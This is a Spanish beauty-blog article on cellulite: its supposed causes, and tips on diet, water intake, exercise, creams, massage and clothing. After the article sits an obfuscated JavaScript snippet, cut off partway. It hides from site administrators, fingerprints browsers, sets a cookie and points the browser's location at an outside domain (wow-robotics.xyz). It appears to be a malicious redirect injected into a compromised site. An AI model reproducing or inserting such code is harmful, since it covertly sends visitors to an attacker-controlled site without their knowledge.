Podemos definir la celulitis como “una acumulación subcutánea de grasa en ciertas partes del cuerpo, que toman el aspecto de la piel de la naranja”. La celulitis está sobre todo presente en glúteos, piernas y tripa y afecta tanto a mujeres delgadas como gruesas. Muchas pueden ser las causas de la aparición de la celulitis:

– Factor hereditario

– Genética

– Deficiencias en la nutrición

– Problemas circulatorios

– Ansiedad

– Depresión

Para evitar la aparición de la celulitis o difuminarla progresivamente, debes llevar a cabo unos pasos fundamentales: Aliméntate correctamente. Procura llevar una alimentación sana y equilibrada. Es recomendable que no te excedas en el consumo de bebidas alcohólicas, refrescos con gas o la sal, que provoca importantes retenciones de agua. Bebe al menos, 1,5 o 2 litros de agua diarios para que tu organismo drene correctamente.

La práctica de algún deporte te ayudará a vencer la celulitis. Y utiliza cremas reductoras y anticelulíticas, que te ayuden a mejorar la elasticidad de la piel y eviten su degradación. Procura masajear con movimientos circulares, las zonas afectadas diariamente y trabájalas con tus manos o con aparatología específica para unos resultados satisfactorios. Intenta evitar la ropa muy ajustada y procura no estar mucho tiempo sentada o con las piernas cruzadas. Esto conseguirá que retengas más líquidos y por lo tanto, que cada vez se muestren más zonas de tu cuerpo con la temible piel de naranja.

Y recodad que hay que ser constante ¡Ánimo que el verano está a la vuelta de la esquina!

 

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone